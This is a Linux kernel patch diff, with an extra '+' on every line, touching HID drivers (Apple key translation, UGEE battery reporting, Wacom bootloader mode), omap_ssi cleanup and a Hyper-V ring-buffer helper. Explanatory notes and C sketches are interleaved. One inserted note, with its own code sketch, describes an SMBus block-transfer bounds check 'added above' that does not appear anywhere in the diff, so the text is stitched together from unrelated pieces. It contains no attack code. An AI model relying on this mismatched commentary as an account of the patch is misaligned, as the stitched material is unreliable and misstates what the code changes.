+diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
+index 6970797cdc56d..c671ce94671ca 100644
+--- a/drivers/hid/hid-apple.c
++++ b/drivers/hid/hid-apple.c
+@@ -314,6 +314,7 @@ static const struct apple_key_translation swapped_option_cmd_keys[] = {
+ 
+ static const struct apple_key_translation swapped_fn_leftctrl_keys[] = {
+ 	{ KEY_FN, KEY_LEFTCTRL },
++	{ KEY_LEFTCTRL, KEY_FN },
+ 	{ }
+ };
+ 
+@@ -375,24 +376,40 @@ static int hidinput_apple_event(struct hid_device *hid, struct input_dev *input,
+ 	struct apple_sc *asc = hid_get_drvdata(hid);
+ 	const struct apple_key_translation *trans, *table;
+ 	bool do_translate;
+-	u16 code = 0;
++	u16 code = usage->code;
+ 	unsigned int real_fnmode;
+ 
+-	u16 fn_keycode = (swap_fn_leftctrl) ? (KEY_LEFTCTRL) : (KEY_FN);
+-
+-	if (usage->code == fn_keycode) {
+-		asc->fn_on = !!value;
+-		input_event_with_scancode(input, usage->type, KEY_FN,
+-				usage->hid, value);
+-		return 1;
+-	}
+-
+ 	if (fnmode == 3) {
+ 		real_fnmode = (asc->quirks & APPLE_IS_NON_APPLE) ? 2 : 1;
+ 	} else {
+ 		real_fnmode = fnmode;
+ 	}
+ 
++	if (swap_fn_leftctrl) {
++		trans = apple_find_translation(swapped_fn_leftctrl_keys, code);
++
++		if (trans)
++			code = trans->to;
++	}
++
++	if (iso_layout > 0 || (iso_layout < 0 && (asc->quirks & APPLE_ISO_TILDE_QUIRK) &&
++			hid->country == HID_COUNTRY_INTERNATIONAL_ISO)) {
++		trans = apple_find_translation(apple_iso_keyboard, code);
++
++		if (trans)
++			code = trans->to;
++	}
++
++	if (swap_opt_cmd) {
++		trans = apple_find_translation(swapped_option_cmd_keys, code);
++
++		if (trans)
++			code = trans->to;
++	}
++
++	if (code == KEY_FN)
++		asc->fn_on = !!value;
++
+ 	if (real_fnmode) {
+ 		if (hid->product == USB_DEVICE_ID_APPLE_ALU_WIRELESS_ANSI ||
+ 		    hid->product == USB_DEVICE_ID_APPLE_ALU_WIRELESS_ISO ||
+@@ -430,15 +447,18 @@ static int hidinput_apple_event(struct hid_device *hid, struct input_dev *input,
+ 		else
+ 			table = apple_fn_keys;
+ 
+-		trans = apple_find_translation (table, usage->code);
++		trans = apple_find_translation(table, code);
+ 
+ 		if (trans) {
+-			if (test_bit(trans->from, input->key))
++			bool from_is_set = test_bit(trans->from, input->key);
++			bool to_is_set = test_bit(trans->to, input->key);
++
++			if (from_is_set)
+ 				code = trans->from;
+-			else if (test_bit(trans->to, input->key))
++			else if (to_is_set)
+ 				code = trans->to;
+ 
+-			if (!code) {
++			if (!(from_is_set || to_is_set)) {
+ 				if (trans->flags & APPLE_FLAG_FKEY) {
+ 					switch (real_fnmode) {
+ 					case 1:
+@@ -455,62 +475,31 @@ static int hidinput_apple_event(struct hid_device *hid, struct input_dev *input,
+ 					do_translate = asc->fn_on;
+ 				}
+ 
+-				code = do_translate ? trans->to : trans->from;
++				if (do_translate)
++					code = trans->to;
+ 			}
+-
+-			input_event_with_scancode(input, usage->type, code,
+-					usage->hid, value);
+-			return 1;
+ 		}
+ 
+ 		if (asc->quirks & APPLE_NUMLOCK_EMULATION &&
+-				(test_bit(usage->code, asc->pressed_numlock) ||
++				(test_bit(code, asc->pressed_numlock) ||
+ 				test_bit(LED_NUML, input->led))) {
+-			trans = apple_find_translation(powerbook_numlock_keys,
+-					usage->code);
++			trans = apple_find_translation(powerbook_numlock_keys, code);
+ 
+ 			if (trans) {
+ 				if (value)
+-					set_bit(usage->code,
+-							asc->pressed_numlock);
++					set_bit(code, asc->pressed_numlock);
+ 				else
+-					clear_bit(usage->code,
+-							asc->pressed_numlock);
++					clear_bit(code, asc->pressed_numlock);
+ 
+-				input_event_with_scancode(input, usage->type,
+-						trans->to, usage->hid, value);
++				code = trans->to;
+ 			}
+-
+-			return 1;
+ 		}
+ 	}
+ 
+-	if (iso_layout > 0 || (iso_layout < 0 && (asc->quirks & APPLE_ISO_TILDE_QUIRK) &&
+-			hid->country == HID_COUNTRY_INTERNATIONAL_ISO)) {
+-		trans = apple_find_translation(apple_iso_keyboard, usage->code);
+-		if (trans) {
+-			input_event_with_scancode(input, usage->type,
+-					trans->to, usage->hid, value);
+-			return 1;
+-		}
+-	}
+-
+-	if (swap_opt_cmd) {
+-		trans = apple_find_translation(swapped_option_cmd_keys, usage->code);
+-		if (trans) {
+-			input_event_with_scancode(input, usage->type,
+-					trans->to, usage->hid, value);
+-			return 1;
+-		}
+-	}
++	if (usage->code != code) {
++		input_event_with_scancode(input, usage->type, code, usage->hid, value);
+ 
+-	if (swap_fn_leftctrl) {
+-		trans = apple_find_translation(swapped_fn_leftctrl_keys, usage->code);
+-		if (trans) {
+-			input_event_with_scancode(input, usage->type,
+-					trans->to, usage->hid, value);
+-			return 1;
+-		}
++		return 1;
+ 	}
+ 
+ 	return 0;
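
The hid-apple rework above funnels every enabled translation table through a single working copy of the key code and emits one input event at the end, only when the code actually changed. A simplified standalone sketch of that table-walk pattern (key values taken from input-event-codes.h, everything else illustrative):

#include <stdio.h>

struct key_translation {
	unsigned short from;
	unsigned short to;
};

/* Both directions are listed, matching swapped_fn_leftctrl_keys above. */
static const struct key_translation swapped_fn_leftctrl[] = {
	{ 464 /* KEY_FN */, 29 /* KEY_LEFTCTRL */ },
	{ 29 /* KEY_LEFTCTRL */, 464 /* KEY_FN */ },
	{ 0, 0 }
};

static unsigned short translate(const struct key_translation *table,
				unsigned short code)
{
	for (; table->from; table++)
		if (table->from == code)
			return table->to;
	return code;	/* no match: leave the code untouched */
}

int main(void)
{
	unsigned short code = 29;	/* incoming KEY_LEFTCTRL */

	code = translate(swapped_fn_leftctrl, code);
	if (code != 29)	/* only report when a table rewrote the code */
		printf("report translated code %u (KEY_FN)\n", code);
	return 0;
}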
+@@ -640,9 +629,6 @@ static void apple_setup_input(struct input_dev *input)
+ 	apple_setup_key_translation(input, apple2021_fn_keys);
+ 	apple_setup_key_translation(input, macbookpro_no_esc_fn_keys);
+ 	apple_setup_key_translation(input, macbookpro_dedicated_esc_fn_keys);
+-
+-	if (swap_fn_leftctrl)
+-		apple_setup_key_translation(input, swapped_fn_leftctrl_keys);
+ }
+ 
+ static int apple_input_mapping(struct hid_device *hdev, struct hid_input *hi,
+@@ -1011,21 +997,21 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING9_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J140K),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J132),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J680),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J213),
+-		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL },
++		.driver_data = APPLE_HAS_FN | APPLE_BACKLIGHT_CTL | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J214K),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J223),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J230K),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J152F),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_WIRELESS_2009_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_WIRELESS_2009_ISO),
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 859aeb07542e3..d728a94c642eb 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
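
The bounds check added above exists because in SMBus block transfers block[0] carries the byte count and block[1..] the payload, so the DMA mapping covers count + 1 bytes; a count of 0 or above 32 would produce a bogus transfer size. A standalone sketch of the validation:

#include <stdio.h>

#define I2C_SMBUS_BLOCK_MAX	32	/* per the SMBus specification */

static int validate_block_write(const unsigned char *block)
{
	/* block[0] = length, block[1..block[0]] = payload */
	if (block[0] < 1 || block[0] > I2C_SMBUS_BLOCK_MAX)
		return -1;	/* the driver returns -EINVAL here */

	printf("dma_size = %u bytes\n", block[0] + 1);
	return 0;
}

int main(void)
{
	unsigned char good[] = { 2, 0xAA, 0x55 };
	unsigned char bad[]  = { 0 };

	validate_block_write(good);			/* dma_size = 3 bytes */
	return validate_block_write(bad) ? 0 : 1;	/* bad must be rejected */
}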
+@@ -340,6 +340,7 @@ static enum power_supply_property hidinput_battery_props[] = {
+ #define HID_BATTERY_QUIRK_PERCENT	(1 << 0) /* always reports percent */
+ #define HID_BATTERY_QUIRK_FEATURE	(1 << 1) /* ask for feature report */
+ #define HID_BATTERY_QUIRK_IGNORE	(1 << 2) /* completely ignore the battery */
++#define HID_BATTERY_QUIRK_AVOID_QUERY	(1 << 3) /* do not query the battery */
+ 
+ static const struct hid_device_id hid_battery_quirks[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_APPLE,
+@@ -373,6 +374,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+@@ -554,6 +557,9 @@ static int hidinput_setup_battery(struct hid_device *dev, unsigned report_type,
+ 	dev->battery_avoid_query = report_type == HID_INPUT_REPORT &&
+ 				   field->physical == HID_DG_STYLUS;
+ 
++	if (quirks & HID_BATTERY_QUIRK_AVOID_QUERY)
++		dev->battery_avoid_query = true;
++
+ 	dev->battery = power_supply_register(&dev->dev, psy_desc, &psy_cfg);
+ 	if (IS_ERR(dev->battery)) {
+ 		error = PTR_ERR(dev->battery);
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 8a2aac18dcc51..656757c79f6b8 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -2548,12 +2548,17 @@ static int hidpp_ff_init(struct hidpp_device *hidpp,
+ 	struct hid_device *hid = hidpp->hid_dev;
+ 	struct hid_input *hidinput;
+ 	struct input_dev *dev;
+-	const struct usb_device_descriptor *udesc = &(hid_to_usb_dev(hid)->descriptor);
+-	const u16 bcdDevice = le16_to_cpu(udesc->bcdDevice);
++	struct usb_device_descriptor *udesc;
++	u16 bcdDevice;
+ 	struct ff_device *ff;
+ 	int error, j, num_slots = data->num_effects;
+ 	u8 version;
+ 
++	if (!hid_is_usb(hid)) {
++		hid_err(hid, "device is not USB\n");
++		return -ENODEV;
++	}
++
+ 	if (list_empty(&hid->inputs)) {
+ 		hid_err(hid, "no inputs found\n");
+ 		return -ENODEV;
+@@ -2567,6 +2572,8 @@ static int hidpp_ff_init(struct hidpp_device *hidpp,
+ 	}
+ 
+ 	/* Get firmware release */
++	udesc = &(hid_to_usb_dev(hid)->descriptor);
++	bcdDevice = le16_to_cpu(udesc->bcdDevice);
+ 	version = bcdDevice & 255;
+ 
+ 	/* Set supported force feedback capabilities */
+diff --git a/drivers/hid/hid-mcp2221.c b/drivers/hid/hid-mcp2221.c
+index de52e9f7bb8cb..560eeec4035aa 100644
+--- a/drivers/hid/hid-mcp2221.c
++++ b/drivers/hid/hid-mcp2221.c
+@@ -840,12 +840,19 @@ static int mcp2221_probe(struct hid_device *hdev,
+ 		return ret;
+ 	}
+ 
+-	ret = hid_hw_start(hdev, HID_CONNECT_HIDRAW);
++	/*
++	 * This driver uses the .raw_event callback and therefore does not need any
++	 * HID_CONNECT_xxx flags.
++	 */
++	ret = hid_hw_start(hdev, 0);
+ 	if (ret) {
+ 		hid_err(hdev, "can't start hardware\n");
+ 		return ret;
+ 	}
+ 
++	hid_info(hdev, "USB HID v%x.%02x Device [%s] on %s\n", hdev->version >> 8,
++			hdev->version & 0xff, hdev->name, hdev->phys);
++
+ 	ret = hid_hw_open(hdev);
+ 	if (ret) {
+ 		hid_err(hdev, "can't open device\n");
+@@ -870,8 +877,7 @@ static int mcp2221_probe(struct hid_device *hdev,
+ 	mcp->adapter.retries = 1;
+ 	mcp->adapter.dev.parent = &hdev->dev;
+ 	snprintf(mcp->adapter.name, sizeof(mcp->adapter.name),
+-			"MCP2221 usb-i2c bridge on hidraw%d",
+-			((struct hidraw *)hdev->hidraw)->minor);
++			"MCP2221 usb-i2c bridge");
+ 
+ 	ret = i2c_add_adapter(&mcp->adapter);
+ 	if (ret) {
+diff --git a/drivers/hid/hid-rmi.c b/drivers/hid/hid-rmi.c
+index bb1f423f4ace3..84e7ba5314d3f 100644
+--- a/drivers/hid/hid-rmi.c
++++ b/drivers/hid/hid-rmi.c
+@@ -326,6 +326,8 @@ static int rmi_input_event(struct hid_device *hdev, u8 *data, int size)
+ 	if (!(test_bit(RMI_STARTED, &hdata->flags)))
+ 		return 0;
+ 
++	pm_wakeup_event(hdev->dev.parent, 0);
++
+ 	local_irq_save(flags);
+ 
+ 	rmi_set_attn_data(rmi_dev, data[1], &data[2], size - 2);
+diff --git a/drivers/hid/hid-sensor-custom.c b/drivers/hid/hid-sensor-custom.c
+index 32c2306e240d6..602465ad27458 100644
+--- a/drivers/hid/hid-sensor-custom.c
++++ b/drivers/hid/hid-sensor-custom.c
+@@ -62,7 +62,7 @@ struct hid_sensor_sample {
+ 	u32 raw_len;
+ } __packed;
+ 
+-static struct attribute hid_custom_attrs[] = {
++static struct attribute hid_custom_attrs[HID_CUSTOM_TOTAL_ATTRS] = {
+ 	{.name = "name", .mode = S_IRUGO},
+ 	{.name = "units", .mode = S_IRUGO},
+ 	{.name = "unit-expo", .mode = S_IRUGO},
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index 34fa991e6267e..cd1233d7e2535 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -18,6 +18,7 @@
+ #include "usbhid/usbhid.h"
+ #include "hid-ids.h"
+ #include <linux/ctype.h>
++#include <linux/string.h>
+ #include <asm/unaligned.h>
+ 
+ /**
+@@ -1211,6 +1212,69 @@ static int uclogic_params_ugee_v2_init_frame_mouse(struct uclogic_params *p)
+ 	return rc;
+ }
+ 
++/**
++ * uclogic_params_ugee_v2_has_battery() - check whether a UGEE v2 device has
++ * a battery or not.
++ * @hdev:	The HID device of the tablet interface.
++ *
++ * Returns:
++ *	True if the device has a battery, false otherwise.
++ */
++static bool uclogic_params_ugee_v2_has_battery(struct hid_device *hdev)
++{
++	/* The XP-PEN Deco LW vendor, product and version IDs are identical
++	 * to those of the Deco L. The only difference reported by their
++	 * firmware is the product name. Add a quirk to support battery
++	 * reporting on the wireless version.
++	 */
++	if (hdev->vendor == USB_VENDOR_ID_UGEE &&
++	    hdev->product == USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) {
++		struct usb_device *udev = hid_to_usb_dev(hdev);
++
++		if (strstarts(udev->product, "Deco LW"))
++			return true;
++	}
++
++	return false;
++}
++
++/**
++ * uclogic_params_ugee_v2_init_battery() - initialize UGEE v2 battery reporting.
++ * @hdev:	The HID device of the tablet interface, cannot be NULL.
++ * @p:		Parameters to fill in, cannot be NULL.
++ *
++ * Returns:
++ *	Zero, if successful. A negative errno code on error.
++ */
++static int uclogic_params_ugee_v2_init_battery(struct hid_device *hdev,
++					       struct uclogic_params *p)
++{
++	int rc = 0;
++
++	if (!hdev || !p)
++		return -EINVAL;
++
++	/* Some tablets contain invalid characters in hdev->uniq, throwing a
++	 * "hwmon: '<name>' is not a valid name attribute, please fix" error.
++	 * Use the device vendor and product IDs instead.
++	 */
++	snprintf(hdev->uniq, sizeof(hdev->uniq), "%x-%x", hdev->vendor,
++		 hdev->product);
++
++	rc = uclogic_params_frame_init_with_desc(&p->frame_list[1],
++						 uclogic_rdesc_ugee_v2_battery_template_arr,
++						 uclogic_rdesc_ugee_v2_battery_template_size,
++						 UCLOGIC_RDESC_UGEE_V2_BATTERY_ID);
++	if (rc)
++		return rc;
++
++	p->frame_list[1].suffix = "Battery";
++	p->pen.subreport_list[1].value = 0xf2;
++	p->pen.subreport_list[1].id = UCLOGIC_RDESC_UGEE_V2_BATTERY_ID;
++
++	return rc;
++}
++
+ /**
+  * uclogic_params_ugee_v2_init() - initialize a UGEE graphics tablets by
+  * discovering their parameters.
+@@ -1334,6 +1398,15 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 	if (rc)
+ 		goto cleanup;
+ 
++	/* Initialize the battery interface */
++	if (uclogic_params_ugee_v2_has_battery(hdev)) {
++		rc = uclogic_params_ugee_v2_init_battery(hdev, &p);
++		if (rc) {
++			hid_err(hdev, "error initializing battery: %d\n", rc);
++			goto cleanup;
++		}
++	}
++
+ output:
+ 	/* Output parameters */
+ 	memcpy(params, &p, sizeof(*params));
+diff --git a/drivers/hid/hid-uclogic-rdesc.c b/drivers/hid/hid-uclogic-rdesc.c
+index 6b73eb0df6bd7..fb40775f5f5b3 100644
+--- a/drivers/hid/hid-uclogic-rdesc.c
++++ b/drivers/hid/hid-uclogic-rdesc.c
+@@ -1035,6 +1035,40 @@ const __u8 uclogic_rdesc_ugee_v2_frame_mouse_template_arr[] = {
+ const size_t uclogic_rdesc_ugee_v2_frame_mouse_template_size =
+ 			sizeof(uclogic_rdesc_ugee_v2_frame_mouse_template_arr);
+ 
++/* Fixed report descriptor template for UGEE v2 battery reports */
++const __u8 uclogic_rdesc_ugee_v2_battery_template_arr[] = {
++	0x05, 0x01,         /*  Usage Page (Desktop),                   */
++	0x09, 0x07,         /*  Usage (Keypad),                         */
++	0xA1, 0x01,         /*  Collection (Application),               */
++	0x85, UCLOGIC_RDESC_UGEE_V2_BATTERY_ID,
++			    /*      Report ID,                          */
++	0x75, 0x08,         /*      Report Size (8),                    */
++	0x95, 0x02,         /*      Report Count (2),                   */
++	0x81, 0x01,         /*      Input (Constant),                   */
++	0x05, 0x84,         /*      Usage Page (Power Device),          */
++	0x05, 0x85,         /*      Usage Page (Battery System),        */
++	0x09, 0x65,         /*      Usage (AbsoluteStateOfCharge),      */
++	0x75, 0x08,         /*      Report Size (8),                    */
++	0x95, 0x01,         /*      Report Count (1),                   */
++	0x15, 0x00,         /*      Logical Minimum (0),                */
++	0x26, 0xff, 0x00,   /*      Logical Maximum (255),              */
++	0x81, 0x02,         /*      Input (Variable),                   */
++	0x75, 0x01,         /*      Report Size (1),                    */
++	0x95, 0x01,         /*      Report Count (1),                   */
++	0x15, 0x00,         /*      Logical Minimum (0),                */
++	0x25, 0x01,         /*      Logical Maximum (1),                */
++	0x09, 0x44,         /*      Usage (Charging),                   */
++	0x81, 0x02,         /*      Input (Variable),                   */
++	0x95, 0x07,         /*      Report Count (7),                   */
++	0x81, 0x01,         /*      Input (Constant),                   */
++	0x75, 0x08,         /*      Report Size (8),                    */
++	0x95, 0x07,         /*      Report Count (7),                   */
++	0x81, 0x01,         /*      Input (Constant),                   */
++	0xC0                /*  End Collection                          */
++};
++const size_t uclogic_rdesc_ugee_v2_battery_template_size =
++			sizeof(uclogic_rdesc_ugee_v2_battery_template_arr);
++
+ /* Fixed report descriptor for Ugee EX07 frame */
+ const __u8 uclogic_rdesc_ugee_ex07_frame_arr[] = {
+ 	0x05, 0x01,             /*  Usage Page (Desktop),                   */
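
Decoding the template above, each battery report is 12 bytes on the wire; a sketch of the layout it describes (struct and field names hypothetical):

#include <stdint.h>

struct ugee_v2_battery_report {
	uint8_t report_id;	/* UCLOGIC_RDESC_UGEE_V2_BATTERY_ID (0xba) */
	uint8_t pad0[2];	/* Input (Constant), 2 x 8 bits */
	uint8_t charge;		/* AbsoluteStateOfCharge, 0..255 */
	uint8_t charging;	/* bit 0: Charging flag, bits 1-7: padding */
	uint8_t pad1[7];	/* Input (Constant), 7 x 8 bits */
};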
+diff --git a/drivers/hid/hid-uclogic-rdesc.h b/drivers/hid/hid-uclogic-rdesc.h
+index 0502a06564964..a1f78c07293ff 100644
+--- a/drivers/hid/hid-uclogic-rdesc.h
++++ b/drivers/hid/hid-uclogic-rdesc.h
+@@ -161,6 +161,9 @@ extern const size_t uclogic_rdesc_v2_frame_dial_size;
+ /* Device ID byte offset in v2 frame dial reports */
+ #define UCLOGIC_RDESC_V2_FRAME_DIAL_DEV_ID_BYTE	0x4
+ 
++/* Report ID for tweaked UGEE v2 battery reports */
++#define UCLOGIC_RDESC_UGEE_V2_BATTERY_ID 0xba
++
+ /* Fixed report descriptor template for UGEE v2 pen reports */
+ extern const __u8 uclogic_rdesc_ugee_v2_pen_template_arr[];
+ extern const size_t uclogic_rdesc_ugee_v2_pen_template_size;
+@@ -177,6 +180,10 @@ extern const size_t uclogic_rdesc_ugee_v2_frame_dial_template_size;
+ extern const __u8 uclogic_rdesc_ugee_v2_frame_mouse_template_arr[];
+ extern const size_t uclogic_rdesc_ugee_v2_frame_mouse_template_size;
+ 
++/* Fixed report descriptor template for UGEE v2 battery reports */
++extern const __u8 uclogic_rdesc_ugee_v2_battery_template_arr[];
++extern const size_t uclogic_rdesc_ugee_v2_battery_template_size;
++
+ /* Fixed report descriptor for Ugee EX07 frame */
+ extern const __u8 uclogic_rdesc_ugee_ex07_frame_arr[];
+ extern const size_t uclogic_rdesc_ugee_ex07_frame_size;
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index 0667b6022c3b7..a9428b7f34a46 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -554,7 +554,8 @@ static void i2c_hid_get_input(struct i2c_hid *ihid)
+ 	i2c_hid_dbg(ihid, "input: %*ph\n", ret_size, ihid->inbuf);
+ 
+ 	if (test_bit(I2C_HID_STARTED, &ihid->flags)) {
+-		pm_wakeup_event(&ihid->client->dev, 0);
++		if (ihid->hid->group != HID_GROUP_RMI)
++			pm_wakeup_event(&ihid->client->dev, 0);
+ 
+ 		hid_input_report(ihid->hid, HID_INPUT_REPORT,
+ 				ihid->inbuf + sizeof(__le16),
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index 634263e4556b0..fb538a6c4add8 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -155,6 +155,9 @@ static int wacom_raw_event(struct hid_device *hdev, struct hid_report *report,
+ {
+ 	struct wacom *wacom = hid_get_drvdata(hdev);
+ 
++	if (wacom->wacom_wac.features.type == BOOTLOADER)
++		return 0;
++
+ 	if (size > WACOM_PKGLEN_MAX)
+ 		return 1;
+ 
+@@ -2785,6 +2788,11 @@ static int wacom_probe(struct hid_device *hdev,
+ 		return error;
+ 	}
+ 
++	if (features->type == BOOTLOADER) {
++		hid_warn(hdev, "Using device in hidraw-only mode");
++		return hid_hw_start(hdev, HID_CONNECT_HIDRAW);
++	}
++
+ 	error = wacom_parse_and_register(wacom, false);
+ 	if (error)
+ 		return error;
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 0f3d57b426846..9312d611db8e5 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -4882,6 +4882,9 @@ static const struct wacom_features wacom_features_0x3dd =
+ static const struct wacom_features wacom_features_HID_ANY_ID =
+ 	{ "Wacom HID", .type = HID_GENERIC, .oVid = HID_ANY_ID, .oPid = HID_ANY_ID };
+ 
++static const struct wacom_features wacom_features_0x94 =
++	{ "Wacom Bootloader", .type = BOOTLOADER };
++
+ #define USB_DEVICE_WACOM(prod)						\
+ 	HID_DEVICE(BUS_USB, HID_GROUP_WACOM, USB_VENDOR_ID_WACOM, prod),\
+ 	.driver_data = (kernel_ulong_t)&wacom_features_##prod
+@@ -4955,6 +4958,7 @@ const struct hid_device_id wacom_ids[] = {
+ 	{ USB_DEVICE_WACOM(0x84) },
+ 	{ USB_DEVICE_WACOM(0x90) },
+ 	{ USB_DEVICE_WACOM(0x93) },
++	{ USB_DEVICE_WACOM(0x94) },
+ 	{ USB_DEVICE_WACOM(0x97) },
+ 	{ USB_DEVICE_WACOM(0x9A) },
+ 	{ USB_DEVICE_WACOM(0x9F) },
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 5ca6c06d143be..16f221388563d 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -243,6 +243,7 @@ enum {
+ 	MTTPC,
+ 	MTTPC_B,
+ 	HID_GENERIC,
++	BOOTLOADER,
+ 	MAX_TYPE
+ };
+ 
+diff --git a/drivers/hsi/controllers/omap_ssi_core.c b/drivers/hsi/controllers/omap_ssi_core.c
+index eb98201583185..26f2c3c012978 100644
+--- a/drivers/hsi/controllers/omap_ssi_core.c
++++ b/drivers/hsi/controllers/omap_ssi_core.c
+@@ -502,8 +502,10 @@ static int ssi_probe(struct platform_device *pd)
+ 	platform_set_drvdata(pd, ssi);
+ 
+ 	err = ssi_add_controller(ssi, pd);
+-	if (err < 0)
++	if (err < 0) {
++		hsi_put_controller(ssi);
+ 		goto out1;
++	}
+ 
+ 	pm_runtime_enable(&pd->dev);
+ 
+@@ -536,9 +538,9 @@ out3:
+ 	device_for_each_child(&pd->dev, NULL, ssi_remove_ports);
+ out2:
+ 	ssi_remove_controller(ssi);
++	pm_runtime_disable(&pd->dev);
+ out1:
+ 	platform_set_drvdata(pd, NULL);
+-	pm_runtime_disable(&pd->dev);
+ 
+ 	return err;
+ }
+@@ -629,7 +631,13 @@ static int __init ssi_init(void) {
+ 	if (ret)
+ 		return ret;
+ 
+-	return platform_driver_register(&ssi_port_pdriver);
++	ret = platform_driver_register(&ssi_port_pdriver);
++	if (ret) {
++		platform_driver_unregister(&ssi_pdriver);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(ssi_init);
+ 
+diff --git a/drivers/hv/ring_buffer.c b/drivers/hv/ring_buffer.c
+index 59a4aa86d1f35..c6692fd5ab155 100644
+--- a/drivers/hv/ring_buffer.c
++++ b/drivers/hv/ring_buffer.c
+@@ -280,6 +280,19 @@ void hv_ringbuffer_cleanup(struct hv_ring_buffer_info *ring_info)
+ 	ring_info->pkt_buffer_size = 0;
+ }
+ 
++/*
++ * Check if the ring buffer spinlock is available to take or not; used in
++ * atomic contexts, like the panic path (see the Hyper-V framebuffer driver).
++ */
++
++bool hv_ringbuffer_spinlock_busy(struct vmbus_channel *channel)
++{
++	struct hv_ring_buffer_info *rinfo = &channel->outbound;
++
++	return spin_is_locked(&rinfo->ring_lock);
++}
++EXPORT_SYMBOL_GPL(hv_ringbuffer_spinlock_busy);
++
+ /* Write to the ring buffer. */
+ int hv_ringbuffer_write(struct vmbus_channel *channel,
+ 			const struct kvec *kv_list, u32 kv_count,
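
The new export above lets atomic-context callers test the outbound ring lock before trying to send; a hypothetical caller sketch (example_send_update() stands in for whatever the real driver would send):

/* In a panic notifier, the panicking CPU may already hold the ring
 * lock, so taking it again would deadlock; probe it and bail out.
 */
static void example_panic_update(struct vmbus_channel *channel)
{
	if (hv_ringbuffer_spinlock_busy(channel))
		return;		/* lock held: drop this update */

	example_send_update(channel);	/* hypothetical send helper */
}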
